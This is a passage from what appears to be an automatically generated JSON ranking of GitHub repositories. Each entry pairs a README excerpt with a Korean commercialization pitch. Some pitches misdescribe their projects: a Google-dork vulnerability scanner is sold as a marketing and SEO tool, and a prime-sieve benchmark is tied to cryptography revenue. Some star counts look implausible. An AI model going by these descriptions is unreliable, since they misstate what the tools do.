있는 구독형 서비스\n- ","readme_excerpt":"# AltStore\n\n> AltStore is an alternative app store for non-jailbroken iOS devices. \n\n[![Swift Version](https://img.shields.io/badge/swift-5.0-orange.svg)](https://swift.org/)\n[![License: AGPL v3](https://img.shields.io/badge/License-AGPL%20v3-blue.svg)](https://www.gnu.org/licenses/agpl-3.0)\n[![PRs Welcome](https://img.shields.io/badge/PRs-welcome-brightgreen.svg?style=flat-square)](http://makeapullrequest.com)\n\nAltStore is an iOS application that allows you to sideload other apps (.ipa files) onto your iOS device with just your Apple ID. AltStore resigns apps with your personal development certificate and sends them to a desktop app, AltServer, which installs the resigned apps back to your device using iTunes WiFi sync. To prevent apps from expiring, AltStore will also periodically refresh your apps in the background when on the same WiFi as AltServer.\n\nFor the initial release, I focused on building a solid foundation for distributing my own apps — primarily Delta, [my all-in-one emul","composite_score":0.1373,"license_safety_tag":"risky"},{"name":"mclaeo/polymarket-copytrade","github_url":"https://github.com/mclaeo/polymarket-copytrade","stars":146,"language":"TypeScript","license":"NOASSERTION","abandonment_months":1,"description":"","readme_excerpt":"","composite_score":0.1373,"license_safety_tag":"unknown"},{"name":"PaperMC/Paper","github_url":"https://github.com/PaperMC/Paper","stars":23,"language":"Java","license":"NOASSERTION","abandonment_months":0,"description":"# PaperMC/Paper 사업화 분석\n\n## 왜 보물인가\n마인크래프트 게임 서버를 더 빠르고 안정적으로 운영할 수 있게 해주는 핵심 도구로, 수만 개의 게임 서버가 이를 기반으로 운영되고 있습니다.\n\n## 어디에 쓸 수 있나\n1. **게임 호스팅 SaaS**: 초보자도 쉽게 마인크래프트 서버를 구축·운영할 수 있는 클라우드 플랫폼\n2. **기업용 게이미","readme_excerpt":"Paper [![Version](https://img.shields.io/maven-metadata/v?metadataUrl=https%3A%2F%2Fartifactory.papermc.io%2Fartifactory%2Funiverse%2Fio%2Fpapermc%2Fpaper%2Fpaper-api%2Fmaven-metadata.xml&strategy=highestVersion&filter=26.1*&label=version&color=%23344ceb\n)](https://papermc.io/downloads/paper)\n[![Paper Build Status](https://img.shields.io/github/actions/workflow/status/PaperMC/Paper/build.yml?branch=main)](https://github.com/PaperMC/Paper/actions)\n[![Discord](https://img.shields.io/discord/289587909051416579.svg?label=&logo=discord&logoColor=ffffff&color=7389D8&labelColor=6A7EC2)](https://discord.gg/papermc)\n[![GitHub Sponsors](https://img.shields.io/github/sponsors/papermc?label=GitHub%20Sponsors)](https://github.com/sponsors/PaperMC)\n[![Open Collective](https://img.shields.io/opencollective/all/papermc?label=OpenCollective%20Sponsors)](https://opencollective.com/papermc)\n===========\n\nThe most widely used, high-performance Minecraft server that aims to fix gameplay and mechanics incons","composite_score":0.137,"license_safety_tag":"unknown"},{"name":"mdecrevoisier/Windows-auditing-mindmap","github_url":"https://github.com/mdecrevoisier/Windows-auditing-mindmap","stars":10,"language":"","license":"BSD-2-Clause","abandonment_months":7,"description":"# Windows-auditing-mindmap 보물 분석\n\n## 왜 보물인가\nWindows 컴퓨터의 보안 감시 방법을 체계적으로 정리한 자료로, 기업의 IT 보안 담당자들이 필요로 하는 실무 지식을 한눈에 파악할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **기업 보안 교육 플랫폼**: 직원들에게 Windows 보안 감시 방법을 가르치는 온라인 강좌","readme_excerpt":"# Microsoft-eventlog-mindmap\n\n## Project purpose\n**Microsoft eventlog mindmap** provides an overview on well-known Microsoft products and solutions, as well as their auditing capacities. It enables defenders to enhance visibility on monitored environments for purposes like:\n* Log collection (eg: into a SIEM)\n* Threat hunting\n* Incident response\n* Forensic\n* Troubleshooting\n\n## Active mindmaps\nThe following mindmaps are currently provided (PDF/PNG/SVG formats):\n* Windows OS auditing baseline\n* Windows Server roles auditing (includes SQL Server and Advanced Threat Analytics)\n* Active Directory (ADDS) auditing\n* Exchange Server 2016/2019 auditing\n* Exchange email forwarding hunting\n\n# Windows OS event logs\nThis map provides an overview of the native Event logs shipped in Windows OS. They are classified into different categories (network, security, application,...) and their related auditing settings.\n![](/windows-auditing-baseline-map/windows-auditing-baseline-map.png)\n\n# Windows Server r","composite_score":0.1369,"license_safety_tag":"safe"},{"name":"PlummersSoftwareLLC/Primes","github_url":"https://github.com/PlummersSoftwareLLC/Primes","stars":6,"language":"C","license":"unknown","abandonment_months":0,"description":"# PlummersSoftwareLLC/Primes 상업화 분석\n\n## 왜 보물인가\n소수(특정 숫자)를 찾는 기술은 암호화, 보안, 금융 거래 검증 등 매우 큰 시장에서 필수적이므로 높은 수익 잠재력이 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 개인 개발자나 학생을 대상으로 한 온라인 소수 계산 도구 (브라우저에서 바로 사용)\n2","readme_excerpt":"# Primes | A Software Drag Race\n\n![example workflow](https://github.com/PlummersSoftwareLLC/Primes/actions/workflows/CI.yml/badge.svg?branch=drag-race)\n\nSource code to [Dave's Garage videos](https://www.youtube.com/playlist?list=PLF2KJ6Gy3cZ5Er-1eF9fN1Hgw_xkoD9V1) benchmarking the same prime number sieve in a selection of 100+ programming languages, as featured in this project repository.\n\nThe first video brought many visitors and contributors here initially, so we're linking to it for convenience:\n\n[![Software Drag Racing | Dave's Garage](https://img.youtube.com/vi/D3h62rgewZM/0.jpg)](https://youtu.be/D3h62rgewZM)\n\n## Background\n\nThis project was an unplanned spin-off from the video linked to above, in which Dave drag-races three programming languages (C#, C++ and Python) to compare their relative speeds, using the Sieve of Eratosthenes algorithm to identify prime number up to a certain limit.\n\nHe posted the source code of his implementations online (in the first incarnation of this r","composite_score":0.1369,"license_safety_tag":"unknown"},{"name":"signalapp/Signal-iOS","github_url":"https://github.com/signalapp/Signal-iOS","stars":6,"language":"Swift","license":"AGPL-3.0","abandonment_months":0,"description":"# Signal-iOS 저장소 분석\n\n## 왜 보물인가\n세계 수백만 명이 사용하는 안전한 메신저 앱의 핵심 코드로, 개인정보 보호 기술의 최고 수준을 담고 있습니다.\n\n## 어디에 쓸 수 있나\n1. **기업용 보안 메신저 SaaS**: Signal의 암호화 기술을 기반으로 기업 직원 간 안전한 소통 플랫폼 구축\n2. **의료/법률 상담 앱**: 환자-의사,","readme_excerpt":"# Signal iOS\n\nSignal is a free and open source messaging app for simple private communication with friends.\n\n[![Available on the App Store](https://signal.org/external/images/app-store-download-badge.svg)](https://apps.apple.com/app/id874139669)\n\nAlso available on [Android](https://github.com/signalapp/signal-android) and [Desktop](https://github.com/signalapp/signal-desktop).\n\n## Questions?\n\nFor troubleshooting and questions, please visit our [support center](https://support.signal.org/) or [unofficial community forum](https://community.signalusers.org/).\n\n## Contributing Bug Reports\n\nThe best way to submit a bug report or support request is [via the Support Center](https://support.signal.org/hc/requests/new). Signal iOS doesn't collect any analytics or telemetry, and we rely on your feedback to help us troubleshoot and fix problems when something isn't working correctly.\n\n## Contributing Code\n\nInstructions for how to configure your development environment and build Signal iOS can be ","composite_score":0.1367,"license_safety_tag":"risky"},{"name":"ai-okx/alpha-arena-okx","github_url":"https://github.com/ai-okx/alpha-arena-okx","stars":34,"language":"Python","license":"NOASSERTION","abandonment_months":4,"description":"","readme_excerpt":"","composite_score":0.1367,"license_safety_tag":"unknown"},{"name":"SudhanPlayz/Discord-MusicBot","github_url":"https://github.com/SudhanPlayz/Discord-MusicBot","stars":6,"language":"HTML","license":"NOASSERTION","abandonment_months":1,"description":"# Discord 음악봇 저장소 분석\n\n## 왜 보물인가\n디스코드 사용자들이 음성 채팅 중 음악을 재생할 수 있게 해주는 자동화 도구로, 게임 커뮤니티와 온라인 모임에서 즉시 활용 가능합니다.\n\n## 어디에 쓸 수 있나\n1. **디스코드 커뮤니티 운영 SaaS**: 서버 관리자가 월 구독으로 고급 음악 기능(가사 표시, 음질 최적화 등)을 이용하도록 제공\n","readme_excerpt":"<h1 align=\"center\"><img src=\"./assets/logo.gif\" width=\"30px\"> Discord Music Bot <img src=\"./assets/logo.gif\" width=\"30px\"></h1>\n\n# 📦 | Project Archived\n\nThis repository is now archived and no longer maintained.\n\nThere will be no further updates, bug fixes, or support. The code will remain available for reference, learning purposes, or for anyone who wants to fork and continue development on their own.\n\nBig thanks to everyone who contributed, starred, forked, or used this project. Appreciate you all 🫶\n\n## ✨Latest Updates\n\nv5.1 Is in development! Go check it out [HERE!](https://github.com/wtfnotavailable/Discord-MusicBot)\n\nWhat do you gain from it? Let us explain:\n - Completely modular docker environment for easier development and deployment\n - A WORKING DASHBOARD!!!\n - DB Integration for you to save your favorite songs in\n - Integrated self hosted Lavalink\n - Dedicated query channel\n - More commands and functionalities\n - And so much more to come!\n\n## 🚧 | Prerequisites\n\n- [Node.js 16+](","composite_score":0.1367,"license_safety_tag":"unknown"},{"name":"uber/RIBs","github_url":"https://github.com/uber/RIBs","stars":9,"language":"Kotlin","license":"apache-2.0","abandonment_months":8,"description":"# Uber RIBs 분석 보고서\n\n## 왜 보물인가\n우버가 만든 앱 개발 프레임워크로, 복잡한 모바일 앱을 더 체계적이고 빠르게 만들 수 있게 도와주는 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **배달/라이드 앱 개발 SaaS**: 스타트업이 우버 같은 앱을 빠르게 만들 수 있도록 클라우드 기반 개발 플랫폼 제공\n2. **대형 앱 개발사 내부 도구**","readme_excerpt":"<p align=\"center\">\n<img src=\"https://github.com/uber/ribs/blob/assets/rib_horizontal_black.png\" width=\"60%\" height=\"60%\" alt=\"RIBs\"/>\n</p>\n\n[![Android CI](https://github.com/uber/RIBs/actions/workflows/android.yml/badge.svg?branch=main)](https://github.com/uber/RIBs/actions/workflows/android.yml)\n[![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0)\n[![Maven Central](https://img.shields.io/maven-central/v/com.uber.rib/rib-android.svg)](https://search.maven.org/artifact/com.uber.rib/rib-android)\n\n> ⚠️ **Alert:** RIBs for IOS has been has been moved to a [separate repo](https://github.com/uber/ribs-ios)\n\nRIBs is the cross-platform architecture framework behind many mobile apps at Uber. The name RIBs is short for Router, Interactor and Builder, which are core components of this architecture. This framework is designed for mobile apps with a large number of engineers and nested states.\n\nThe RIBs architecture provides:\n* **Share","composite_score":0.1366,"license_safety_tag":"safe"},{"name":"hasherezade/mal_unpack","github_url":"https://github.com/hasherezade/mal_unpack","stars":9,"language":"C","license":"BSD-2-Clause","abandonment_months":1,"description":"# mal_unpack 저장소 분석\n\n## 왜 보물인가\n컴퓨터 바이러스를 분석하는 보안 전문가들이 악성 소프트웨어의 숨겨진 실제 코드를 찾아내는 데 필요한 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **기업 사이버보안 솔루션**: 대기업의 보안팀이 네트워크 침입 시도를 탐지하고 대응하는 SaaS 플랫폼에 내장\n2. **내부 악성코드 분석 도구**: 금융","readme_excerpt":"# mal_unpack\n![](./logo/logo.png)\n\n[![Build status](https://ci.appveyor.com/api/projects/status/3cqqlah6unfhasik?svg=true)](https://ci.appveyor.com/project/hasherezade/mal-unpack)\n[![Codacy Badge](https://app.codacy.com/project/badge/Grade/fedbe124aa694761907bbe51bfc8d6f9)](https://app.codacy.com/gh/hasherezade/mal_unpack/dashboard?branch=master)\n[![Commit activity](https://img.shields.io/github/commit-activity/m/hasherezade/mal_unpack)](https://github.com/hasherezade/mal_unpack/commits)\n[![Last Commit](https://img.shields.io/github/last-commit/hasherezade/mal_unpack/master)](https://github.com/hasherezade/mal_unpack/commits)\n\n[![GitHub release](https://img.shields.io/github/release/hasherezade/mal_unpack.svg)](https://github.com/hasherezade/mal_unpack/releases)\n[![GitHub release date](https://img.shields.io/github/release-date/hasherezade/mal_unpack?color=blue)](https://github.com/hasherezade/mal_unpack/releases)\n[![Github All Releases](https://img.shields.io/github/downloads/hasherez","composite_score":0.1366,"license_safety_tag":"safe"},{"name":"benbalter/pi-hole-cloudflared-docker-compose-ansible-caddy","github_url":"https://github.com/benbalter/pi-hole-cloudflared-docker-compose-ansible-caddy","stars":17,"language":"Dockerfile","license":"MIT","abandonment_months":7,"description":"# Pi-hole + Cloudflared + Docker Compose + Ansible + Caddy 저장소 분석\n\n## 왜 보물인가\n집에 있는 인터넷 기기들의 광고를 자동으로 차단하고 보안을 강화하는 통합 솔루션을 누구나 쉽게 설치할 수 있도록 만든 프로젝트입니다.\n\n## 어디에 쓸 수 있나\n\n1. **개인/소규모 사무실 네트워크 보안 서비스**: 월","readme_excerpt":"# Example Docker Compose and Ansible configuration for running Pi-Hole, Cloudflared, and Caddy\n\nExample configuration for using Pi-Hole, Cloudflared, Docker Compose, Ansible, and Caddy to over-engineer your home network for privacy and security.\n\n## Details\n\nSee [How I re-over-engineered my home network for privacy and security](https://ben.balter.com/2021/09/01/how-i-re-over-engineered-my-home-network/) (and [How I over-engineered my home network for privacy and security](https://ben.balter.com/2020/12/04/over-engineered-home-network-for-privacy-and-security/)).\n\n## Usage\n\n1. Download the [Raspberry Pi Imager](https://www.raspberrypi.org/software/) and flash the latest version of Raspberry Pi OS *Lite*.\n2. Run `ansible-playbook playbook.yml --inventory hosts.yml`\n3. Sit back and wait until you have a fully configured PiHole running in about 5-10 minutes\n","composite_score":0.1366,"license_safety_tag":"safe"},{"name":"Qix-/color","github_url":"https://github.com/Qix-/color","stars":11,"language":"JavaScript","license":"mit","abandonment_months":6,"description":"# Qix-/color 저장소 분석\n\n## 왜 보물인가\n색상을 다루는 웹사이트나 디자인 도구에서 색깔을 쉽게 변환하고 관리할 수 있는 작은 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **디자인 협업 SaaS**: 팀원들이 색상 값을 실시간으로 공유하고 변환하는 기능 제공\n2. **전자상거래 내부 도구**: 상품 이미지의 색상을 표준화하거나 일괄 변환하는 ","readme_excerpt":"# color\n\n> JavaScript library for immutable color conversion and manipulation with support for CSS color strings.\n\n```js\nconst color = Color('#7743CE').alpha(0.5).lighten(0.5);\nconsole.log(color.hsl().string());  // 'hsla(262, 59%, 81%, 0.5)'\n\nconsole.log(color.cmyk().round().array());  // [ 16, 25, 0, 8, 0.5 ]\n\nconsole.log(color.ansi256().object());  // { ansi256: 183, alpha: 0.5 }\n```\n\n## Install\n```shell\nnpm install color\n```\n\n## Usage\n```js\nimport Color from 'color';\n```\n\n### Constructors\n```js\n// string constructor\nconst color = Color('rgb(255, 255, 255)')                       // { model: 'rgb', color: [ 255, 255, 255 ], valpha: 1 }\nconst color = Color('hsl(194, 53%, 79%)')                       // { model: 'hsl', color: [ 195, 53, 79 ], valpha: 1 }\nconst color = Color('hsl(194, 53%, 79%, 0.5)')                  // { model: 'hsl', color: [ 195, 53, 79 ], valpha: 0.5 }\nconst color = Color('#FF0000')                                  // { model: 'rgb', color: [ 255, 0, 0 ], valpha: ","composite_score":0.1364,"license_safety_tag":"safe"},{"name":"strozfriedberg/cobaltstrike-config-extractor","github_url":"https://github.com/strozfriedberg/cobaltstrike-config-extractor","stars":7,"language":"Python","license":"NOASSERTION","abandonment_months":7,"description":"# Cobalt Strike Config Extractor 분석\n\n## 왜 보물인가\n악성 소프트웨어를 탐지하고 분석하는 보안 전문가들이 위협 정보를 빠르게 추출할 수 있도록 돕는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **보안 회사 SaaS 플랫폼**: 악성코드 분석 자동화 서비스에 통합하여 고객사의 위협 탐지 속도 향상\n2. **기업 보안팀 내부 도","readme_excerpt":"#################################################\nCobalt Strike Configuration Extractor and Parser\n#################################################\n\nOverview\n=========\n\nPure Python library and set of scripts to extract and parse configurations (configs) from `Cobalt Strike Beacons <https://www.cobaltstrike.com/help-beacon>`_.\nThe library, ``libcsce``, contains classes for building tools to work with Beacon configs.\nThere are also two CLI scripts included that use the library to parse Beacon config data:\n\n1. ``csce``: Parses all known Beacon config settings to JSON,\n   mimicing the `Malleable C2 profile <https://cobaltstrike.com/help-malleable-c2>`_ structure.\n2. ``list-cs-settings``: Attempts to find by brute-force the associated Cobalt Strike version, and all settings/their types, of a Beacon config.\n   This script is useful for conducting research on Beacon samples.\n\nInstallation\n=============\n\nInstall from Pypi (preferred method)\n-------------------------------------\n\n.. code-block","composite_score":0.1363,"license_safety_tag":"unknown"},{"name":"ghacksuserjs/ghacks-user.js","github_url":"https://github.com/ghacksuserjs/ghacks-user.js","stars":5,"language":"JavaScript","license":"mit","abandonment_months":0,"description":"# ghacksuserjs/ghacks-user.js 분석 보고서\n\n## 왜 보물인가\n웹 브라우저의 개인정보 보호 설정을 자동으로 최적화해주는 오픈소스 도구로, 일반 사용자도 손쉽게 온라인 프라이버시를 강화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 기업 직원의 보안 설정을 일괄 관리하는 클라우드 기반 보호 서비스\n- **내부 ","readme_excerpt":"This repo and the interative webpage linked below are the **_only official sources_** - do not trust any other sites claiming to be Arkenfox\n\n### 🟪  user.js\nA `user.js` is a configuration file that can control Firefox settings - for a more technical breakdown and explanation, you can read more in the [wiki](https://github.com/arkenfox/user.js/wiki/2.1-User.js)\n\n### 🟩  the arkenfox user.js\n\n[![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](https://opensource.org/licenses/MIT)\n\nThe `arkenfox user.js` is a **template** which aims to provide as much privacy and enhanced security as possible, and to reduce tracking and fingerprinting as much as possible - while minimizing any loss of functionality and breakage (but it will happen).\n\nEveryone, experts included, should at least read the [wiki](https://github.com/arkenfox/user.js/wiki), as it contains important information regarding a few `user.js` settings. There is also an [interactive current release](https://arkenfox.g","composite_score":0.1363,"license_safety_tag":"safe"},{"name":"carlospolop/privilege-escalation-awesome-scripts-suite","github_url":"https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite","stars":11,"language":"C#","license":"NOASSERTION","abandonment_months":0,"description":"# carlospolop/privilege-escalation-awesome-scripts-suite 분석\n\n## 왜 보물인가\n컴퓨터 보안 전문가들이 시스템의 약점을 찾아내고 수정하는 데 필요한 다양한 도구와 방법을 한곳에 모아놓은 자료 모음입니다.\n\n## 어디에 쓸 수 있나\n\n1. **기업 보안 점검 서비스**: 기업의 컴퓨터 시스템이 안전한지 미리 점검","readme_excerpt":"# PEASS-ng - Privilege Escalation Awesome Scripts SUITE new generation\n\n![](https://github.com/peass-ng/PEASS-ng/raw/master/linPEAS/images/peass.png)\n\n![](https://img.shields.io/badge/Black-Arch-black) ![](https://img.shields.io/badge/Arch-AUR-brightgreen) ![](https://img.shields.io/badge/Black%20Hat%20Arsenal-Asia%202020-red)\n\n## Linux Privesc official course to master LinPEAS\n\n**Check <https://hacktricks-training.com/courses/lhe/> to learn tens of linux privesc techniques and master LinPEAS**\n\n# Basic Tutorial\n[![Tutorial](https://img.youtube.com/vi/2Ey1WQXNp3w/0.jpg)](https://www.youtube.com/watch?v=9_fJv_weLU0&list=PL9fPq3eQfaaDxjpXaDYApfVA_IB8T14w7)\n\n\nHere you will find **privilege escalation tools for Windows and Linux/Unix\\* and MacOS**.\n\nThese tools search for possible **local privilege escalation paths** that you could exploit and print them to you **with nice colors** so you can recognize the misconfigurations easily.\n\n- Check the **Local Windows Privilege Escalation checklis","composite_score":0.1361,"license_safety_tag":"unknown"},{"name":"framework7io/Framework7","github_url":"https://github.com/framework7io/Framework7","stars":15,"language":"JavaScript","license":"mit","abandonment_months":1,"description":"# Framework7 저장소 분석\n\n## 왜 보물인가\n스마트폰 앱처럼 보이는 웹사이트를 쉽게 만들 수 있는 도구로, 개발자들이 빠르게 모바일 서비스를 출시할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 기업용 업무 관리 앱(일정, 메모, 업무 추적)을 웹 기반으로 제공\n- **내부 업무 도구**: 회사 직원들이 스마트폰에서 ","readme_excerpt":"<p align=\"center\"><a href=\"https://framework7.io\" target=\"_blank\" rel=\"noopener noreferrer\"><img width=\"150\" src=\"https://framework7.io/i/logo.svg\" alt=\"Framework7\"></a></p>\n\n<p align=\"center\">\n  <a href=\"https://www.patreon.com/framework7\"><img src=\"https://framework7.io/i/support-badge.png\" height=\"20\"></a>\n  <a href=\"https://travis-ci.org/framework7io/framework7\"><img src=\"https://travis-ci.org/framework7io/framework7.svg?branch=master\" alt=\"Build Status\"></a>\n  <a href=\"https://greenkeeper.io/\"><img src=\"https://badges.greenkeeper.io/framework7io/Framework7.svg\" alt=\"Greenkeeper\"></a>\n</p>\n\n<h1 align=\"center\">Framework7</h1>\n\n<p align=\"center\">Full Featured Mobile HTML Framework For Building iOS & Android Apps</p>\n\n<h2 align=\"center\">Supporting Framework7</h2>\n\nFramework7 is an MIT-licensed open source project with its ongoing development made possible entirely by the support of these awesome [backers](https://github.com/framework7io/framework7/blob/master/BACKERS.md). If you'd lik","composite_score":0.1359,"license_safety_tag":"safe"},{"name":"opsdisk/pagodo","github_url":"https://github.com/opsdisk/pagodo","stars":11,"language":"Python","license":"gpl-3.0","abandonment_months":6,"description":"# opsdisk/pagodo 분석 보고서\n\n## 왜 보물인가\nGoogle 검색 결과를 자동으로 수집하는 도구로, 마케팅·리서치 담당자들이 수동으로 하던 작업을 자동화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 웹사이트 SEO 순위 추적 및 경쟁사 모니터링 플랫폼\n- **내부 업무 도구**: 기업의 마케팅팀이 자사 제품 온라인 ","readme_excerpt":"# pagodo - Passive Google Dork\n\n## Introduction\n\n`pagodo` automates Google searching for potentially vulnerable web pages and applications on the Internet. It replaces\nmanually performing Google dork searches with a web GUI browser.\n\nThere are 2 parts. The first is `ghdb_scraper.py` that retrieves the latest Google dorks and the second portion is\n`pagodo.py` that leverages the information gathered by `ghdb_scraper.py`.\n\nThe core Google search library now uses the more flexible [yagooglesearch](https://github.com/opsdisk/yagooglesearch)\ninstead of [googlesearch](https://github.com/MarioVilas/googlesearch). Check out the [yagooglesearch\nREADME](https://github.com/opsdisk/yagooglesearch/blob/master/README.md) for a more in-depth explanation of the library\ndifferences and capabilities.\n\nThis version of `pagodo` also supports native HTTP(S) and SOCKS5 application support, so no more wrapping it in a tool\nlike `proxychains4` if you need proxy support. You can specify multiple proxies to use ","composite_score":0.1359,"license_safety_tag":"restricted"},{"name":"leecade/react-native-swiper","github_url":"https://github.com/leecade/react-native-swiper","stars":5,"language":"JavaScript","license":"mit","abandonment_months":4,"description":"# react-native-swiper 분석 보고서\n\n## 왜 보물인가\n스마트폰 앱에서 손가락으로 좌우로 넘기는 동작을 쉽게 만들어주는 도구로, 모바일 앱 개발자들이 반복적으로 필요로 하는 기능입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 이커머스 앱이나 사진 공유 앱처럼 여러 이미지를 넘겨보는 기능이 필요한 온라인 서비스\n2. **내부","readme_excerpt":"<p align=\"center\">\n  <img alt=\"react-native-swiper\" src=\"http://i.imgur.com/P4cRUgD.png\" width=\"208\">\n</p>\n\n<p align=\"center\">\n  The best Swiper component for React Native.\n</p>\n\n<p align=\"center\">\n  <a href=\"http://standardjs.com/\"><img alt=\"JavaScript Style Guide\" src=\"https://img.shields.io/badge/code%20style-standard-brightgreen.svg?style=flat-square\"></a>\n  <a href=\"https://npmjs.org/package/react-native-swiper\"><img alt=\"npm version\" src=\"http://img.shields.io/npm/v/react-native-swiper.svg?style=flat-square\"></a>\n  <a href=\"https://npmjs.org/package/react-native-swiper\"><img alt=\"npm version\" src=\"http://img.shields.io/npm/dm/react-native-swiper.svg?style=flat-square\"></a>\n  <a href=\"https://github.com/leecade/react-native-swiper/pulls?q=is%3Apr+is%3Aclosed\"><img alt=\"PR Stats\" src=\"https://img.shields.io/issuestats/i/github/leecade/react-native-swiper.svg?style=flat-square\"></a>\n  <a href=\"https://github.com/leecade/react-native-swiper/issues?q=is%3Aissue+is%3Aclosed\"><img alt=\"","composite_score":0.1359,"license_safety_tag":"safe"},{"name":"testing-library/jest-dom","github_url":"https://github.com/testing-library/jest-dom","stars":5,"language":"JavaScript","license":"MIT","abandonment_months":1,"description":"# testing-library/jest-dom 상용화 분석\n\n## 왜 보물인가\n웹사이트나 앱이 제대로 작동하는지 자동으로 검사해주는 도구로, 소프트웨어 품질을 보장하는 필수 기술입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 웹 애플리케이션 개발 회사들이 자동 품질 검사 기능을 자신의 개발 플랫폼에 내장\n- **내부 업무 도구**: 금융사","readme_excerpt":"<div align=\"center\">\n<h1>jest-dom</h1>\n\n<a href=\"https://www.emojione.com/emoji/1f989\">\n  <img\n    height=\"80\"\n    width=\"80\"\n    alt=\"owl\"\n    src=\"https://raw.githubusercontent.com/testing-library/jest-dom/main/other/owl.png\"\n  />\n</a>\n\n<p>Custom jest matchers to test the state of the DOM</p>\n\n</div>\n\n---\n\n<!-- prettier-ignore-start -->\n[![Build Status][build-badge]][build]\n[![Code Coverage][coverage-badge]][coverage]\n[![version][version-badge]][package] [![downloads][downloads-badge]][npmtrends]\n[![MIT License][license-badge]][license]\n\n[![All Contributors](https://img.shields.io/badge/all_contributors-28-orange.svg?style=flat-square)](#contributors-)\n[![PRs Welcome][prs-badge]][prs] [![Code of Conduct][coc-badge]][coc]\n[![Discord][discord-badge]][discord]\n\n[![Watch on GitHub][github-watch-badge]][github-watch]\n[![Star on GitHub][github-star-badge]][github-star]\n[![Tweet][twitter-badge]][twitter]\n<!-- prettier-ignore-end -->\n\n## The problem\n\nYou want to use [jest][] to write tests t","composite_score":0.1357,"license_safety_tag":"safe"},{"name":"mozilla/voice-web","github_url":"https://github.com/mozilla/voice-web","stars":24,"language":"TypeScript","license":"MPL-2.0","abandonment_months":0,"description":"# Mozilla Voice Web 상업화 분석\n\n## 왜 보물인가\n누구나 자신의 목소리로 인공지능을 학습시킬 수 있는 오픈소스 플랫폼으로, 음성 인식 기술을 민주화하는 프로젝트입니다.\n\n## 어디에 쓸 수 있나\n1. **음성 인식 SaaS**: 자동 회의 녹음 정리, 팟캐스트 자동 자막 생성 서비스\n2. **내부 업무 도구**: 기업의 음성 기반 문서 작","readme_excerpt":"# Common Voice\n\nThis is the web app for [Mozilla Common Voice](https://commonvoice.mozilla.org), a platform for collecting speech donations in order to create public domain datasets for training voice recognition-related tools.\n\n## Upcoming releases\n\n| Type             | Release Cadence  | More info      |\n| :--------------- |:---------------|:---------------|\n| Platform code & sentences | Monthly, or as needed | [Release notes](https://github.com/common-voice/common-voice/releases) |\n| Dataset          | Quarterly | [Dataset metadata](https://github.com/common-voice/cv-dataset/) |\n\n## Quick links\n\n- [Code of conduct](./docs/CODE_OF_CONDUCT.md)\n- [ChangeLog](./docs/CHANGELOG.md)\n- [Development setup](./docs/DEVELOPMENT.md)\n- [Language workflow](./docs/LANGUAGE.md)\n- [Sentences workflow](./docs/SENTENCES.md)\n- [Discourse forum](https://discourse.mozilla-community.org/c/voice)\n- [Matrix chat](https://chat.mozilla.org/#/room/#common-voice:mozilla.org)\n- [License](./LICENSE)\n\n## How to con","composite_score":0.1354,"license_safety_tag":"unknown"},{"name":"franciscop/server","github_url":"https://github.com/franciscop/server","stars":11,"language":"JavaScript","license":"mit","abandonment_months":11,"description":"# franciscop/server 상용화 분석\n\n## 왜 보물인가\n웹 서버를 쉽게 만들고 관리할 수 있는 도구로, 프로그래밍 지식이 없어도 인터넷 서비스를 구축할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n\n**1. 소규모 비즈니스 웹사이트 구축 SaaS**\n- 카페, 병원, 학원 같은 소상공인이 자신의 웹사이트를 직접 만들고 유지보수할 수 있게 지원","readme_excerpt":"# **server.js** for Node.js\n\n[![Downloads](https://img.shields.io/npm/dm/server.svg)](https://npm-stat.com/charts.html?package=server)\n[![Status](https://github.com/franciscop/server/workflows/tests/badge.svg)](https://github.com/franciscop/server/actions)\n\nPowerful server for Node.js that just works so **you can focus on your awesome project**:\n\n```js\n// Include it and extract some methods for convenience\nconst server = require('server');\nconst { get, post } = server.router;\n\n// Launch server with options and a couple of routes\nserver({ port: 8080 }, [\n  get('/', ctx => 'Hello world'),\n  post('/', ctx => {\n    console.log(ctx.data);\n    return 'ok';\n  })\n]);\n```\n\n## Getting started\n\nThere's a [whole tutorial on getting started for beginners](https://serverjs.io/tutorials/getting-started/) but the quick version is to first install `server` as a dependency:\n\n```bash\nnpm install server\n```\n\n> Server requires **Node.js 7.6.0** or newer. **Node.js 8.x.y** LTS is recommended.\n\nThen you can ","composite_score":0.1354,"license_safety_tag":"safe"},{"name":"WalshyDev/Discord-Spotify-RPC","github_url":"https://github.com/WalshyDev/Discord-Spotify-RPC","stars":7,"language":"JavaScript","license":"GPL-3.0","abandonment_months":3,"description":"# Discord-Spotify-RPC 평가 분석\n\n## 왜 보물인가\n디스코드에서 지금 듣는 음악을 자동으로 친구들에게 보여주는 프로그램으로, 음악 취향을 공유하고 싶은 사람들의 수요가 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 월 구독으로 고급 기능(음악 통계, 친구 추천 기반 재생목록)을 제공하는 웹 앱\n2. **내부 업무 도구","readme_excerpt":"# Dependencies\nThis requires NodeJS 8.0.0 or higher which can be downloaded from [here](https://nodejs.org/en/download/) and Git which can be downloaded from [here](https://git-scm.com/).\n\nFor Linux users, follow these steps to install the dependencies for your distro [here](https://git-scm.com/download/linux) and [here](https://nodejs.org/en/download/package-manager/)\n\nIn CMD / Terminal or whatever the equivelant is of CMD for your operating system, run: `git clone https://github.com/WalshyDev/Discord-Spotify-RPC` then, move into the newly created directory by executing `cd Discord-Spotify-RPC` and then install all packages required by Discord-Spotify-RPC: `npm install` and let NPM install the packages.\n\n# How to run\nRun `npm start` in console after the setup steps and boom! Rich Presence with your Spotify!\n\n# Configuration\n\n## Time setting (elapsed time)\nBy default the time option is `song-time` which will display the elapsed time as the current song time.\n\nAvailable options  \n\n| 